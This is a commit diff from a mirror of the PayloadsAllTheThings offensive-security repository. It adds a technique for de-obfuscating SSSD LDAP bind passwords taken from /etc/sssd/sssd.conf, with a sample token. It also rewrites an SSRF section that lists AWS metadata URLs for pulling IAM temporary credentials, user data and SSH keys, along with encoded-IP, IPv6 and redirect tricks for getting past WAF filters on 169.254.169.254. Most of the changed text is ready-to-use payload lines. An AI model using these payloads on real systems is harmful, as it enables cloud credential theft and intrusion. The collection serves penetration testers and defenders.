mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
AWS EC2 Metadata + SSSD token deobfuscate
This commit is contained in:
parent
5ddd8e04da
commit
113afae290
@ -143,6 +143,7 @@
|
||||
- [CCACHE ticket reuse from SSSD KCM](#ccache-ticket-reuse-from-sssd-kcm)
|
||||
- [CCACHE ticket reuse from keytab](#ccache-ticket-reuse-from-keytab)
|
||||
- [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab)
|
||||
- [Extract accounts from /etc/sssd/sssd.conf](#extract-accounts-from-etcsssdsssdconf)
|
||||
- [References](#references)
|
||||
|
||||
## Tools
|
||||
@ -4276,6 +4277,33 @@ $ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c
|
||||
CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0
|
||||
```
|
||||
|
||||
|
||||
## Extract accounts from /etc/sssd/sssd.conf
|
||||
|
||||
> sss_obfuscate converts a given password into human-unreadable format and places it into appropriate domain section of the SSSD config file, usually located at /etc/sssd/sssd.conf
|
||||
|
||||
The obfuscated password is put into "ldap_default_authtok" parameter of a given SSSD domain and the "ldap_default_authtok_type" parameter is set to "obfuscated_password".
|
||||
|
||||
```ini
|
||||
[sssd]
|
||||
config_file_version = 2
|
||||
...
|
||||
[domain/LDAP]
|
||||
...
|
||||
ldap_uri = ldap://127.0.0.1
|
||||
ldap_search_base = ou=People,dc=srv,dc=world
|
||||
ldap_default_authtok_type = obfuscated_password
|
||||
ldap_default_authtok = [BASE64_ENCODED_TOKEN]
|
||||
```
|
||||
|
||||
De-obfuscate the content of the ldap_default_authtok variable with [mludvig/sss_deobfuscate](https://github.com/mludvig/sss_deobfuscate)
|
||||
|
||||
```ps1
|
||||
./sss_deobfuscate [ldap_default_authtok_base64_encoded]
|
||||
./sss_deobfuscate AAAQABagVAjf9KgUyIxTw3A+HUfbig7N1+L0qtY4xAULt2GYHFc1B3CBWGAE9ArooklBkpxQtROiyCGDQH+VzLHYmiIAAQID
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/)
|
||||
|
@ -249,7 +249,7 @@
|
||||
:warning: Only working with IMDSv1.
|
||||
Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --profile <AWS_PROFILE> --http-endpoint enabled --http-token required`.
|
||||
|
||||
In order to usr IMDSv2 you must provide a token.
|
||||
In order to use IMDSv2 you must provide a token.
|
||||
|
||||
```powershell
|
||||
export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`
|
||||
|
@ -545,77 +545,80 @@ Example of a PDF attachment using HTML
|
||||
|
||||
## SSRF URL for Cloud Instances
|
||||
|
||||
### SSRF URL for AWS Bucket
|
||||
### SSRF URL for AWS
|
||||
|
||||
[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
|
||||
Interesting path to look for at `http://169.254.169.254` or `http://instance-data`
|
||||
The AWS Instance Metadata Service is a service available within Amazon EC2 instances that allows those instances to access metadata about themselves. - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
|
||||
|
||||
|
||||
* Old endpoint: `http://169.254.169.254/latest/meta-data/`
|
||||
* New endpoint requires the header `X-aws-ec2-metadata-token`
|
||||
```powershell
|
||||
export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`
|
||||
curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data"
|
||||
```
|
||||
|
||||
In case of a WAF, you might want to try different ways to connect to the API.
|
||||
* DNS record pointing to the AWS API IP
|
||||
```powershell
|
||||
http://instance-data
|
||||
http://169.254.169.254
|
||||
http://169.254.169.254.nip.io/
|
||||
```
|
||||
* HTTP redirect
|
||||
```powershell
|
||||
Static:http://nicob.net/redir6a
|
||||
Dynamic:http://nicob.net/redir-http-169.254.169.254:80-
|
||||
```
|
||||
* Encoding the IP to bypass WAF
|
||||
```powershell
|
||||
http://425.510.425.510 Dotted decimal with overflow
|
||||
http://2852039166 Dotless decimal
|
||||
http://7147006462 Dotless decimal with overflow
|
||||
http://0xA9.0xFE.0xA9.0xFE Dotted hexadecimal
|
||||
http://0xA9FEA9FE Dotless hexadecimal
|
||||
http://0x41414141A9FEA9FE Dotless hexadecimal with overflow
|
||||
http://0251.0376.0251.0376 Dotted octal
|
||||
http://0251.00376.000251.0000376 Dotted octal with padding
|
||||
http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal)
|
||||
http://[::ffff:a9fe:a9fe] IPV6 Compressed
|
||||
http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded
|
||||
http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4
|
||||
```
|
||||
|
||||
|
||||
These URLs return a list of IAM roles associated with the instance. You can then append the role name to this URL to retrieve the security credentials for the role.
|
||||
```powershell
|
||||
Always here : /latest/meta-data/{hostname,public-ipv4,...}
|
||||
User data (startup script for auto-scaling) : /latest/user-data
|
||||
Temporary AWS credentials : /latest/meta-data/iam/security-credentials/
|
||||
http://169.254.169.254/latest/meta-data/iam/security-credentials
|
||||
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
|
||||
|
||||
# Examples
|
||||
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
|
||||
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
|
||||
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
|
||||
```
|
||||
|
||||
DNS record
|
||||
|
||||
```powershell
|
||||
http://instance-data
|
||||
http://169.254.169.254
|
||||
http://169.254.169.254.nip.io/
|
||||
```
|
||||
|
||||
HTTP redirect
|
||||
|
||||
```powershell
|
||||
Static:http://nicob.net/redir6a
|
||||
Dynamic:http://nicob.net/redir-http-169.254.169.254:80-
|
||||
```
|
||||
|
||||
Alternate IP encoding
|
||||
|
||||
```powershell
|
||||
http://425.510.425.510/ Dotted decimal with overflow
|
||||
http://2852039166/ Dotless decimal
|
||||
http://7147006462/ Dotless decimal with overflow
|
||||
http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal
|
||||
http://0xA9FEA9FE/ Dotless hexadecimal
|
||||
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
|
||||
http://0251.0376.0251.0376/ Dotted octal
|
||||
http://0251.00376.000251.0000376/ Dotted octal with padding
|
||||
http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal)
|
||||
```
|
||||
|
||||
More urls to include
|
||||
|
||||
This URL is used to access the user data that was specified when launching the instance. User data is often used to pass startup scripts or other configuration information into the instance.
|
||||
```powershell
|
||||
http://169.254.169.254/latest/user-data
|
||||
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
|
||||
```
|
||||
|
||||
Other URLs to query to access various pieces of metadata about the instance, like the hostname, public IPv4 address, and other properties.
|
||||
```powershell
|
||||
http://169.254.169.254/latest/meta-data/
|
||||
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
|
||||
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
|
||||
http://169.254.169.254/latest/meta-data/ami-id
|
||||
http://169.254.169.254/latest/meta-data/reservation-id
|
||||
http://169.254.169.254/latest/meta-data/hostname
|
||||
http://169.254.169.254/latest/meta-data/public-keys/
|
||||
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
|
||||
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
|
||||
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
|
||||
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
|
||||
http://169.254.169.254/latest/dynamic/instance-identity/document
|
||||
```
|
||||
|
||||
AWS SSRF Bypasses
|
||||
```
|
||||
Converted Decimal IP: http://2852039166/latest/meta-data/
|
||||
IPV6 Compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/
|
||||
IPV6 Expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/
|
||||
IPV6/IPV4: http://[0:0:0:0:0:ffff:169.254.169.254]/latest/meta-data/
|
||||
```
|
||||
|
||||
E.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance`
|
||||
|
||||
E.g2: Flaws challenge - `http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/`
|
||||
|
||||
|
||||
### SSRF URL for AWS ECS
|
||||
|
||||
If you have an SSRF with file system access on an ECS instance, try extracting `/proc/self/environ` to get UUID.
|
||||
|
Loading…
Reference in New Issue
Block a user